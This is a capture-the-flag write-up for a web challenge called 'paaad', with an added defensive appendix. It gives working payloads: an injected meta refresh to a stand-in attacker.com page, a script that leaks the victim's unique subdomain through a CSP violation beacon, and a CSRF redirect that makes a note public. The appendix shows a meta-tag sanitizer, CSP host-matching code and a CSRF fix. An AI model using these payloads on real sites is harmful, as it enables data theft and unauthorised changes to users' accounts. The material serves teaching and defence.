**tl;dr**

+ Meta redirect to the attacker website, using the HTML injection in the paaad.
+ Leak the unique subdomain with a CSP violation.
+ Another meta redirect CSRF with the leaked subdomain to make the note public.

``First pad``
```html
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">
```

``https://attacker.com/attacker.html``
```html
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
  <title>TEST</title>
</head>

<body>
  <script>
    document.addEventListener('securitypolicyviolation', async function (event) {
      console.log(event)
      navigator.sendBeacon(location.href, event.blockedURI)
    });
  </script>
  <iframe src="https://päääd.space/p/latest"></iframe>
</body>
</html>
```
``Second pad``
```html
<meta http-equiv="refresh" content="1; url=unique_id.xn--pd-viaaa.space?edit=isPublic">
```
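As an added example that is not part of the writeup (all names are hypothetical), two defensive pieces in JavaScript: a sanitizer that removes the `<meta http-equiv>` tags both pads depend on, and the simplified frame-src host matching that shows why `xn--pd-viaaa.space` does not cover the unique subdomain, so the redirect surfaces as a CSP violation instead of loading.

```javascript
// Added example for this writeup (not the challenge's or the author's code; all
// names are hypothetical). Two defensive pieces:
//  1. stripHttpEquivMeta(): drop every <meta http-equiv=...> from user-supplied
//     pad HTML, since both pads in the chain rely on a meta refresh redirect.
//  2. frameSrcAllows(): the host-matching rule behind step 2, where
//     `frame-src 'self' xn--pd-viaaa.space` does NOT cover the unique
//     subdomain, so the iframe navigation is blocked and the blocked URL is
//     handed to the securitypolicyviolation listener.

const META_TAG = /<meta\b[^>]*>/gi;
// http-equiv with a quoted or unquoted value; deliberately broad (a <meta name>
// tag whose other attributes mention http-equiv is removed as well).
const HTTP_EQUIV = /\bhttp-equiv\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/i;

function stripHttpEquivMeta(html) {
  const removed = [];
  const clean = html.replace(META_TAG, (tag) => {
    if (HTTP_EQUIV.test(tag)) { removed.push(tag); return ''; }
    return tag; // <meta charset> / <meta name=...> are harmless and kept
  });
  return { clean, removed };
}

// Simplified CSP host-source matching (host only; scheme and port ignored).
// 'self' matches the page's own host, '*.example' matches any subdomain of
// example, and a bare host matches that exact host and nothing beneath it.
function frameSrcAllows(sources, pageHost, targetHost) {
  const target = targetHost.toLowerCase();
  return sources.some((src) => {
    const s = src.toLowerCase();
    if (s === "'self'") return target === pageHost.toLowerCase();
    if (s.startsWith('*.')) {
      const suffix = s.slice(1); // ".example"
      return target.endsWith(suffix) && target.length > suffix.length;
    }
    return target === s;
  });
}

// Constructed demo input: the writeup's first-pad payload inside some pad text.
const samplePad = '<p>notes</p>\n<meta http-equiv="refresh" content="1;\n' +
  'url=https://attacker.com/attacker.html">\n<meta charset="UTF-8">';

console.log(stripHttpEquivMeta(samplePad).clean);
console.log(frameSrcAllows(["'self'", 'xn--pd-viaaa.space'], 'attacker.com',
  'unique_id.xn--pd-viaaa.space')); // false: the redirect target is blocked
```

The third step is a separate fix: making a note public should require a POST with a CSRF token rather than a GET to `?edit=isPublic`.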

Original writeup (http://blog.bi0s.in/2023/10/16/Web/paaad-Hack.luCTF20232023/).